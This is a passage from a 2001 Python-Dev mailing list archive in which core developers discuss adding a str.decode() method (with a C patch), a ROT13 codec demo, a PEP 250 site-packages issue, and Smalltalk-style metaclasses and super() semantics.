wrapping the binascii > module APIs in form of codecs... Can you provide examples of where this can't be done using the existing approach? Code-bloat police anyone? --Guido van Rossum (home page: http://www.python.org/~guido/) From mal at lemburg.com Wed May 2 20:32:46 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 20:32:46 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> Message-ID: <3AF052CE.E928BDA1@lemburg.com> Guido van Rossum wrote: > > > We already have "data".encode(encoding) which encodes the string data > > by passing it through the encoder of the given encoding. > > > > Wouldn't it be worthwhile to add direct access to codec decoders > > through string methods as well ? > > > > (Note that this addition only makes sense for string objects, > > since Unicode cannot be decoded.) > > > > Also, would there be any objections adding some more standard > > codecs to the system ? I'm thinking of wrapping the binascii > > module APIs in form of codecs... > > Can you provide examples of where this can't be done using the > existing approach? There is no existing elegant approach except hooking up to the codecs directly. Adding .decode() is really a matter of adding symmetry. Here are some example of how these two codec methods could be used: xmltext = binarydata.encode('base64') ... binarydata = xmltext.decode('base64') zzz = data.encode('gzip') ... data = zzz.decode('gzip') jpegimage = gifimage.decode('gif').encode('jpeg') mp3audio = wavaudio.decode('wav').encode('mp3') etc. Basically all content transfer encodings can take advantage of these two methods. It's not really code bloat, BTW, since the C API is there; the .decode() method would just expose it. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Wed May 2 21:38:10 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 14:38:10 -0500 Subject: [Python-Dev] "data".decode(encoding) ?! In-Reply-To: Your message of "Wed, 02 May 2001 20:32:46 +0200." <3AF052CE.E928BDA1@lemburg.com> References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> Message-ID: <200105021938.OAA03550@cj20424-a.reston1.va.home.com> > > Can you provide examples of where this can't be done using the > > existing approach? > > There is no existing elegant approach except hooking up to the > codecs directly. Adding .decode() is really a matter of adding > symmetry. Yes, but symmetry is good except when it isn't. :-) > Here are some example of how these two codec methods could > be used: > > xmltext = binarydata.encode('base64') > ... > binarydata = xmltext.decode('base64') > > zzz = data.encode('gzip') > ... > data = zzz.decode('gzip') > > jpegimage = gifimage.decode('gif').encode('jpeg') > > mp3audio = wavaudio.decode('wav').encode('mp3') > > etc. How would you do this currently? > Basically all content transfer encodings can take advantage of > these two methods. > > It's not really code bloat, BTW, since the C API is there; > the .decode() method would just expose it. Show me the patch and I'll decide whether it's code bloat. :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From fredrik at effbot.org Wed May 2 20:20:24 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Wed, 2 May 2001 20:20:24 +0200 Subject: [Python-Dev] PEP 250 buglet Message-ID: <004b01c0d334$8f600a50$e46940d5@hagrid> PEP 250 suggests changing the sitedirs setup in site.py from sitedirs = [prefix] to sitedirs == [makepath(prefix, "lib", "site-packages")] on windows. it then goes on to say that This change does not preclude packages using the current location -- the change only adds a directory to sys.path, it does not remove anything. this isn't true (even after correcting the typo), since the sitedirs list isn't only added to the path; it's also used to look for PTH files. after this change, PTH files located under prefix will no longer be found. the following change works a bit better: sitedirs = [prefix, makepath(prefix, "lib", "site-packages")] Cheers /F From mal at lemburg.com Wed May 2 21:55:25 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 21:55:25 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> Message-ID: <3AF0662D.48671B4E@lemburg.com> Guido van Rossum wrote: > > > > Can you provide examples of where this can't be done using the > > > existing approach? > > > > There is no existing elegant approach except hooking up to the > > codecs directly. Adding .decode() is really a matter of adding > > symmetry. > > Yes, but symmetry is good except when it isn't. :-) > > > Here are some example of how these two codec methods could > > be used: > > > > xmltext = binarydata.encode('base64') > > ... > > binarydata = xmltext.decode('base64') > > > > zzz = data.encode('gzip') > > ... > > data = zzz.decode('gzip') > > > > jpegimage = gifimage.decode('gif').encode('jpeg') > > > > mp3audio = wavaudio.decode('wav').encode('mp3') > > > > etc. > > How would you do this currently? By looking up the codecs using the codec registry and then calling them directly. > > Basically all content transfer encodings can take advantage of > > these two methods. > > > > It's not really code bloat, BTW, since the C API is there; > > the .decode() method would just expose it. > > Show me the patch and I'll decide whether it's code bloat. :-) I've attached the patch. Due to a small reorganisation the patch is a little longer -- symmetry has its price at C level too ;-) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ -------------- next part -------------- --- CVS-Python/Include/stringobject.h Sat Feb 24 10:30:49 2001 +++ Dev-Python/Include/stringobject.h Wed May 2 21:05:12 2001 @@ -105,10 +105,19 @@ extern DL_IMPORT(PyObject*) PyString_AsE PyObject *str, /* string object */ const char *encoding, /* encoding */ const char *errors /* error handling */ ); +/* Decodes a string object and returns the result as Python string + object. */ + +extern DL_IMPORT(PyObject*) PyString_AsDecodedString( + PyObject *str, /* string object */ + const char *encoding, /* encoding */ + const char *errors /* error handling */ + ); + /* Provides access to the internal data buffer and size of a string object or the default encoded version of an Unicode object. Passing NULL as *len parameter will force the string buffer to be 0-terminated (passing a string with embedded NULL characters will cause an exception). */ --- CVS-Python/Objects/stringobject.c Wed May 2 16:19:22 2001 +++ Dev-Python/Objects/stringobject.c Wed May 2 21:04:34 2001 @@ -138,42 +138,56 @@ PyString_FromString(const char *str) PyObject *PyString_Decode(const char *s, int size, const char *encoding, const char *errors) { - PyObject *buffer = NULL, *str; + PyObject *v, *str; + + str = PyString_FromStringAndSize(s, size); + if (str == NULL) + return NULL; + v = PyString_AsDecodedString(str, encoding, errors); + Py_DECREF(str); + return v; +} + +PyObject *PyString_AsDecodedString(PyObject *str, + const char *encoding, + const char *errors) +{ + PyObject *v; + + if (!PyString_Check(str)) { + PyErr_BadArgument(); + goto onError; + } if (encoding == NULL) encoding = PyUnicode_GetDefaultEncoding(); /* Decode via the codec registry */ - buffer = PyBuffer_FromMemory((void *)s, size); - if (buffer == NULL) - goto onError; - str = PyCodec_Decode(buffer, encoding, errors); - if (str == NULL) + v = PyCodec_Decode(str, encoding, errors); + if (v == NULL) goto onError; /* Convert Unicode to a string using the default encoding */ - if (PyUnicode_Check(str)) { - PyObject *temp = str; - str = PyUnicode_AsEncodedString(str, NULL, NULL); + if (PyUnicode_Check(v)) { + PyObject *temp = v; + v = PyUnicode_AsEncodedString(v, NULL, NULL); Py_DECREF(temp); - if (str == NULL) + if (v == NULL) goto onError; } - if (!PyString_Check(str)) { + if (!PyString_Check(v)) { PyErr_Format(PyExc_TypeError, "decoder did not return a string object (type=%.400s)", - str->ob_type->tp_name); - Py_DECREF(str); + v->ob_type->tp_name); + Py_DECREF(v); goto onError; } - Py_DECREF(buffer); - return str; + return v; onError: - Py_XDECREF(buffer); return NULL; } PyObject *PyString_Encode(const char *s, int size, @@ -1773,10 +1780,29 @@ string_encode(PyStringObject *self, PyOb return NULL; return PyString_AsEncodedString((PyObject *)self, encoding, errors); } +static char decode__doc__[] = +"S.decode([encoding[,errors]]) -> string\n\ +\n\ +Return a decoded string version of S. Default encoding is the current\n\ +default string encoding. errors may be given to set a different error\n\ +handling scheme. Default is 'strict' meaning that encoding errors raise\n\ +a ValueError. Other possible values are 'ignore' and 'replace'."; + +static PyObject * +string_decode(PyStringObject *self, PyObject *args) +{ + char *encoding = NULL; + char *errors = NULL; + if (!PyArg_ParseTuple(args, "|ss:decode", &encoding, &errors)) + return NULL; + return PyString_AsDecodedString((PyObject *)self, encoding, errors); +} + + static char expandtabs__doc__[] = "S.expandtabs([tabsize]) -> string\n\ \n\ Return a copy of S where all tab characters are expanded using spaces.\n\ If tabsize is not given, a tab size of 8 characters is assumed."; @@ -2347,10 +2373,11 @@ string_methods[] = { {"title", (PyCFunction)string_title, 1, title__doc__}, {"ljust", (PyCFunction)string_ljust, 1, ljust__doc__}, {"rjust", (PyCFunction)string_rjust, 1, rjust__doc__}, {"center", (PyCFunction)string_center, 1, center__doc__}, {"encode", (PyCFunction)string_encode, 1, encode__doc__}, + {"decode", (PyCFunction)string_decode, 1, decode__doc__}, {"expandtabs", (PyCFunction)string_expandtabs, 1, expandtabs__doc__}, {"splitlines", (PyCFunction)string_splitlines, 1, splitlines__doc__}, #if 0 {"zfill", (PyCFunction)string_zfill, 1, zfill__doc__}, #endif From mal at lemburg.com Wed May 2 22:36:30 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 22:36:30 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> Message-ID: <3AF06FCE.854D4DF7@lemburg.com> Here's a little fun codec to play with. It encodes the input using the ROT13 encoding (which is 1-1 and idempotent). The main difference over the existing codecs is that it returns a string rather than Unicode. To install it, simply place it in some directory on your Python path. Here's some sample output (Netscape can unscramble this BTW): """ Urer'f n yvggyr sha pbqrp gb cynl jvgu. Vg rapbqrf gur vachg hfvat gur EBG13 rapbqvat (juvpu vf 1-1 naq vqrzcbgrag). Gur znva qvssrerapr bire gur rkvfgvat pbqrpf vf gung vg ergheaf n fgevat engure guna Havpbqr. Gb vafgnyy vg, fvzcyl cynpr vg va fbzr qverpgbel ba lbhe Clguba cngu. """ -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ -------------- next part -------------- A non-text attachment was scrubbed... Name: rot_13.py Type: text/python Size: 2066 bytes Desc: not available URL: From guido at digicool.com Thu May 3 00:11:07 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 17:11:07 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 13:12:21 +0200." <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook> References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook> Message-ID: <200105022211.RAA05242@cj20424-a.reston1.va.home.com> > [From Jim Althoff] > > In the list below, indentation indicates class hieararchy (superclass -- > > subclass) > The indentation, unfortunately, seems to be destroyed. [...] > A question for Jim (this is more Smalltalk than Python related): > How does the Behaviour class fit into this picture? Jim responded with a much clearer diagram, and as a bonus an answer to your question about Behaviour! > Hi Guido, > > Sorry about the mangled diagram. It's kind of tricky doing this with just > text. :-) Anyway, below is a -- hopefully -- improved diagram and > description. > > At the very bottom is an answer to the question about "Behavior". > > Jim > > ========================================== > > Smalltalk-80 (simplified) class/metaclass structure: > > Terminology: > o A "class" is an object that can be instantiated. > o A "metaclass" is a class and is one such that when _it_ is instantiated > _that_ instance is _itself_ a class (which can be instantiated). > (A metaclass is a specialization of class). > > Essentially, there are two parallel hierarchies: 1) the class hierarchy > and 2) the metaclass hierarchy. The class hierarchy starts with class > Object. The metaclass hierarchy starts right below Class with the > metaclass ObjectMetaClass. > > > o Object > o Class > o MetaClass > o ObjectMetaClass > o ClassMetaClass > o MetaClassMetaClass > > Object is the top of the class hierarchy (and total hierarchy). It has no > superclass. It is the only class that has no superclass. > Class is a subclass of Object. > MetaClass is a subclass of Class. > > ObjectMetaClass is also a subclass of Class. > ClassMetaClass is a subclass of ObjectMetaClass. > MetaClassMetaClass is a subclass of ClassMetaClass. > > Adding in application classes Rectangle and SpamRectangle then might look > like: > > > o Object > o Class > o MetaClass > o ObjectMetaClass > o ClassMetaClass > o MetaClassMetaClass > o RectangleMetaClass > o SpamRectangleMetaClass > o Rectangle > o SpamRectangle > > Rectangle is a subclass of Object. > SpamRectangle is a subclass of Rectangle. > > RectangleMetaClass is a subclass of ObjectMetaClass. > SpamRectangleMetaClass is a subclass of RectangleMetaClass. > > Rectangle is an instance of RectangleMetaClass. > SpamRectangle is an instance of SpamRectangleMetaClass. > (SpamRectangleMetaClass is an instance of MetaClass.) > > The next list shows both the subclass- and the instanceOf- relationships > between classes and metaclasses. > > In this list a class listed below another class is a subclass of it. > SpamMC is an abbreviation for SpamMetaClass (the metaclass of class Spam -- > the class of which class Spam is an instance). > > Class > Object instanceOf ObjectMC instanceOf MetaClass > Class instanceOf ClassMC instanceOf MetaClass > MetaClass instanceOf MetaClassMC instanceOf MetaClass > > ObjectMetaClass, ClassMetaClass, and MetaClassMetaClass are all instances > of MetaClass. > > MetaClass is an instance of MetaClassMetaClass But MetaClassMetaClass is > an instance of MetaClass. So this particular relationship is circular. > (In Smalltalk-76, Class was an instance of itself.) > > Application classes would have a similar, parallel hierarchy between > classes and their associated metaclasses. For example: > > Object instanceOf ObjectMC instanceOf MetaClass > Rectangle instanceOf RectangleMC instanceOf MetaClass > SpamRectangle instanceOf SpamRectangleMC instanceOf MetaClass > > When you create class SpamRectangle as a subclass of class Rectangle, the > code in the class-creation method first creates the metaclass > SpamRectangleMetaClass -- by instantiating MetaClass -- as a subclass of > RectangleMetaClass. The code then creates the SpamRectangle class as an > instance of the SpamRectangleMetaClass metaclass it just created. > > You can then create instances of class SpamRectangle. > > SpamRectangle "instance methods" reside in the method dict of > SpamRectangle. > SpamRectangle "class methods" reside in the method dict of > SpamRectangleMetaClass. > > ============================ > > Regarding Thomas' question: > > The Smalltalk-80 class hierarchy actually has a bit more factoring than > what I show above. In particular, Class and MetaClass are subclasses of > the class ClassDescription. ClassDescription is a subclass of class > Behavior. Behavior is a subclass of Object. > > So it looks like: > > > o Object > o Behavior > o ClassDescription > o MetaClass > o Class > o ObjectMetaClass > o BehaviorMetaClass > o ClassDescriptionMetaClass > o MetaClassMetaClass > o ClassMetaClass > > Class Behavior basically abstracts the creation and handling of method > dict.s. Class ClassDescription factors out common, reusable code between > MetaClass and Class. Clearly there are a number of ways of designing (or > over-designing ) this part of the hierarchy. The key idea, though, > was to use the subclassing mechanism as a way of supportig specialized > class methods. > > ============================= --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Wed May 2 23:24:28 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 2 May 2001 17:24:28 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Doc/lib libfuncs.tex,1.76,1.77 In-Reply-To: Message-ID: [Fred L. Drake] > Update the filter() and list() descriptions to include information > about the support for containers and iteration. > ... > \begin{funcdesc}{list}{sequence} > ! Return a list whose items are the same and in the same order as > ! \var{sequence}'s items. \var{sequence} may be either a sequence, > ! a container that supports iteration, or an iterator object. > ... [and similarly for filter()] Before we repeat this last incantation umpteen more times in the docs, is this how we want it to read in the end? The truth of the implementation and of the design is that "sequence" is any object that supports iteration, period (if PyObject_GetIter(op) succeeds, list(op) etc are happy, else they raise TypeError). "A sequence" and "an iterator object" *always* support iteration, so naming them too appears to draw a distinction that doesn't exist. Suggested alternative: \var{sequence} must support iteration (see XXX). where XXX is common boilerplate explaining what "support iteration" means, and that sequences and iterator objects are just particular cases of that. Note that this boilerplate may expand to include generators too before 2.2 is real, and a generator isn't really "a container that supports iteration" (the word "container" is a strain in the generator context). That is, a long-winded incantation is just going to get longer over time, and if it's repeated umpteen places in the docs I doubt they'll all get updated when needed. From michel at digicool.com Wed May 2 23:43:42 2001 From: michel at digicool.com (Michel Pelletier) Date: Wed, 2 May 2001 14:43:42 -0700 (PDT) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105022211.RAA05242@cj20424-a.reston1.va.home.com> Message-ID: On Wed, 2 May 2001, Guido van Rossum wrote: > > > > o Object > > o Class > > o MetaClass > > o ObjectMetaClass > > o ClassMetaClass > > o MetaClassMetaClass > > > > Object is the top of the class hierarchy (and total hierarchy). It has no > > superclass. It is the only class that has no superclass. > > Class is a subclass of Object. > > MetaClass is a subclass of Class. > > > > ObjectMetaClass is also a subclass of Class. > > ClassMetaClass is a subclass of ObjectMetaClass. > > MetaClassMetaClass is a subclass of ClassMetaClass. Does this go on ad infinitum? ie, is there a ClassMetaClassMetaClass which sublcasses MetaClassMetaClass and so on? I was under the impression from talking to JimF that Smalltalk eventually stopped at a class that is a subclass of itself. -Michel From greg at cosc.canterbury.ac.nz Thu May 3 03:35:29 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 13:35:29 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <3AEFCEBD.2E5979C9@lemburg.com> Message-ID: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz> "M.-A. Lemburg" : > I'm not sure I can follow you here: DictType.__repr__ is the > representation method of the dictionary and not inherited > from TypeType, so there should be no problem. The problem is that DictType.__repr__ could mean either the unbound method for finding the repr of a dictionary, or the bound method for finding the repr of DictType itself. This ambiguity is inherent in the Python language as soon as you try to make classes into instances (which you have to do as a consequence of making types into classes). Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Thu May 3 05:15:41 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 15:15:41 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Message-ID: <200105030315.PAA16465@s454.cosc.canterbury.ac.nz> Michel Pelletier : > I was under the impression > from talking to JimF that Smalltalk eventually stopped at a class > that is a subclass of itself. Some years ago, while playing with Sun's Postscript-based NeWS window system, I devised an OO language (called P) that got translated into PostScript. It had a very Smalltalk-like class/metaclass system, although rather simpler than what JimF described. As I remember, the kernel consisted of a little knot of about 6 classes with some interesting incestuous relationships between them. If anyone's interested, I could dig out the code and provide details of how it all worked. There might be some ideas that could be used in Python. (Programming in P felt a lot like programming in Python, by the way. If my name had been Guido, who knows where it might have led!) Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Thu May 3 05:25:12 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 15:25:12 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <3AEFF710.9471.8025D7EA@localhost> Message-ID: <200105030325.PAA16469@s454.cosc.canterbury.ac.nz> Gordon McMillan : > I would like to see ... some discussion of the expected > pragmatic benefits. (That's a different topic from subclassing > types.) Actually, it's not -- the two issues are connected. Suppose we succeed in unifying types and classes. Then instead of classes being of type ClassType, they are now instances of ClassClass. So classes are also instances, or in other words, we have unified classes and instances. So even if we don't go as far as adding Smalltalk-style class-methods-via-metaclasses, we still have to deal with the fact that some things will be both classes and instances. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Thu May 3 05:27:34 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 15:27:34 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105021523.KAA32340@cj20424-a.reston1.va.home.com> Message-ID: <200105030327.PAA16472@s454.cosc.canterbury.ac.nz> Guido: > Actually, I think that what's in the __dict__ is just perfect I was thinking of backwards compatibility for people who are hacking the __dict__ of a class directly. If you don't care about that, the problem is simpler. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Thu May 3 05:39:08 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 15:39:08 +1200 (NZST) Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk) In-Reply-To: <200105021511.KAA32271@cj20424-a.reston1.va.home.com> Message-ID: <200105030339.PAA16476@s454.cosc.canterbury.ac.nz> Guido: > Will we need to add a "::" operator to Python??? If so, I hope we can find a syntax that doesn't remind one of C++ so much... I have an idea! How about spelling super(self, MyBaseClass) as MyBaseClass[self] This can be thought of as a sort of "cast" which turns self into an object which behaves like it were an instance of MyBaseClass. Then we can write MyBaseClass[self].foo(args) Advantages: * Concise and uncluttered * No new syntax needed * Can be implemented using existing mechanisms * Doesn't even remotely resemble anything in C++ :-) Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From tim.one at home.com Thu May 3 07:49:04 2001 From: tim.one at home.com (Tim Peters) Date: Thu, 3 May 2001 01:49:04 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <3AF01381.592AE31B@lemburg.com> Message-ID: [MAL, on basemethods] > ... > In other words: you let Python continue the search for the method > as if it hadn't found the occurrance calling the bsaemethod() > API. Hmm, still not clear enough... better let Tim jump in here > (we've had a discussion about basemethod() some months or years > ago). Tim ? Sorry, I'm not sure what either of you is talking about. In class A(B, C): def foo(self): super.foo() Guido said that super would start searching at B, but I don't know what your "continue the search for the method as if it hadn't found the occurrance calling the bsaemethod() API" means: defining what a thing does in terms of an unspecified API it doesn't use is a pretty sure recipe for compounded confusion . Given that we're using Python's search rules, the ambiguous point remaining is whether: super.f() textually contained in a method of class K begins searching with: 1) K.__bases__ or with: 2) self.__class__.__bases__ Java uses #1, and Guido's "the search starts with B" implies that he would too. But it's unclear whether he meant that. Given also class D(A): def foo(self): super.foo() D().foo() both views agree that D.foo() is invoked first, and that D.foo() invokes A.foo() next. But under #1 A.foo() invokes C.foo() or D.foo() next, while under #2 A.foo() invokes A.foo() again. Multiple inheritance is a red herring here -- take C out of A's bases, and the same ambiguity needs to be resolved. From greg at cosc.canterbury.ac.nz Thu May 3 07:56:07 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 17:56:07 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Message-ID: <200105030556.RAA16509@s454.cosc.canterbury.ac.nz> Tim: > Java uses #1, and Guido's "the search starts with B" implies that he would > too. But it's unclear whether he meant that. It's the only sane thing for him to mean, as far as I can see. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From pf at artcom-gmbh.de Thu May 3 08:29:03 2001 From: pf at artcom-gmbh.de (Peter Funk) Date: Thu, 3 May 2001 08:29:03 +0200 (MEST) Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk) In-Reply-To: <200105030339.PAA16476@s454.cosc.canterbury.ac.nz> from Greg Ewing at "May 3, 2001 3:39: 8 pm" Message-ID: Hi, Greg Ewing: [...] > How about spelling super(self, MyBaseClass) as > > MyBaseClass[self] > > This can be thought of as a sort of "cast" which turns self > into an object which behaves like it were an instance of > MyBaseClass. Then we can write > > MyBaseClass[self].foo(args) > > Advantages: > * Concise and uncluttered > * No new syntax needed > * Can be implemented using existing mechanisms > * Doesn't even remotely resemble anything in C++ :-) Disadvantages: * People will confuse this with calling MyBaseClass.__getitem__(....) * Doesn't even remotely resemble anything in C++ We have to face it: I myself don't like C++ either, but a *lot* of people today are already familar with C++ today. Giving them something they are already familar with, will make it easier to convert some of them to Python. To Greg: This '::' operator is not at all that ugly and AFAI can see would not introduce any backward incompatible change to the language. I'm sure C++ has some other real warts to offer that we both don't want to see in a future version of Python. Right? Regards, Peter -- Peter Funk, Oldenburger Str.86, D-27777 Ganderkesee, Germany, Fax:+49 4222950260 office: +49 421 20419-0 (ArtCom GmbH, Grazer Str.8, D-28359 Bremen, Germany) From mal at lemburg.com Thu May 3 09:49:37 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 03 May 2001 09:49:37 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz> Message-ID: <3AF10D91.802C8555@lemburg.com> Greg Ewing wrote: > > "M.-A. Lemburg" : > > > I'm not sure I can follow you here: DictType.__repr__ is the > > representation method of the dictionary and not inherited > > from TypeType, so there should be no problem. > > The problem is that DictType.__repr__ could mean either > the unbound method for finding the repr of a dictionary, > or the bound method for finding the repr of DictType > itself. > > This ambiguity is inherent in the Python language as soon > as you try to make classes into instances (which you have > to do as a consequence of making types into classes). We are actually trying to turn classes into types here :-) Really, I think that we could resolve this issue by not inheriting from meta-classes. DictType is a creation of the meta-class TypeType. I'm not calling these instances to prevent additional confusion. The root of the problem is that for some reason there is belief that DictType should implicitly inherit attributes and methods from TypeType. If we simply say that there is no implicit inheritance (only explicit one), then these problems should go away. Some of these ideas are burried in the "super" part of this thread. Unfortunately this concept doesn't go very far since Python has multiple inheritance and thus the term "super" (referring to the class' single base class) is not well-defined. As Jim mentioned in his reply to Thomas' question, SmallTalk has two parallel hierarchies. One for the classes and one for the meta-classes. If we follow the same path in Python and keep the two well separated, I think we can resolve many of the issues which are currently showing up. To link the two hierarchies together we don't need a "super" concept, but instead a way to reach the meta-class in charge of a class, say "klass.__creator__". Note that there's another issue hiding in all this and again this is due to multiple inheritance: which meta-class is in charge of a class which is derived from two classes having different meta-classes ? meta1 --> o klass1 o klass1a o klass1b meta2 --> o klass2 o klass2a o klass2b class klass3(klass1a, klass2b): ... I think there's no clean way to resolve this, so I'd suggest to simply rule this out and declare it illegal (class can only be based on classes having the same meta-class). -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From barry at digicool.com Thu May 3 10:24:16 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Thu, 3 May 2001 04:24:16 -0400 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AF06FCE.854D4DF7@lemburg.com> Message-ID: <15089.5552.164307.344721@anthem.wooz.org> >>>>> "M" == M writes: M> Here's a little fun codec to play with. It encodes the input M> using the ROT13 encoding (which is 1-1 and idempotent). LOL! Guess what `language' I chose to use when testing Mailman's i18n support? :) -Barry From fredrik at pythonware.com Thu May 3 10:11:10 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Thu, 3 May 2001 10:11:10 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AF06FCE.854D4DF7@lemburg.com> Message-ID: <028a01c0d3a8$9e05f190$e46940d5@hagrid> mal wrote: > Here's some sample output (Netscape can unscramble this BTW): heh. just discovered that outlook express can deal with this too -- but only if the message comes from the usenet. on ordinary mail, the "unscramble rot13" menu entry is disabled (too much usability testing?) maybe you could repost your secret message to comp.lang.python ;-) Cheers /F From mal at lemburg.com Thu May 3 11:05:41 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 03 May 2001 11:05:41 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AF06FCE.854D4DF7@lemburg.com> <028a01c0d3a8$9e05f190$e46940d5@hagrid> Message-ID: <3AF11F65.5CBF508C@lemburg.com> Fredrik Lundh wrote: > > mal wrote: > > > Here's some sample output (Netscape can unscramble this BTW): > > heh. just discovered that outlook express can deal with this > too -- but only if the message comes from the usenet. > > on ordinary mail, the "unscramble rot13" menu entry is disabled > (too much usability testing?) > > maybe you could repost your secret message to comp.lang.python ;-) It wasn't all that secret: I simply cut&pasted the first two paragraphs of the message through the codec. There was also an inaccuracy in the posting: the codec still produces Unicode (by virtue of using the charmap codec as basis). Still, it serves as nice example of what str.decode() and str.encode() can be used for and also demonstrates how easy it is to install new codecs. I think I'll repost it to c.l.p though -- with a new secret attached to it ;-) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Thu May 3 16:26:22 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 03 May 2001 09:26:22 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Thu, 03 May 2001 09:49:37 +0200." <3AF10D91.802C8555@lemburg.com> References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz> <3AF10D91.802C8555@lemburg.com> Message-ID: 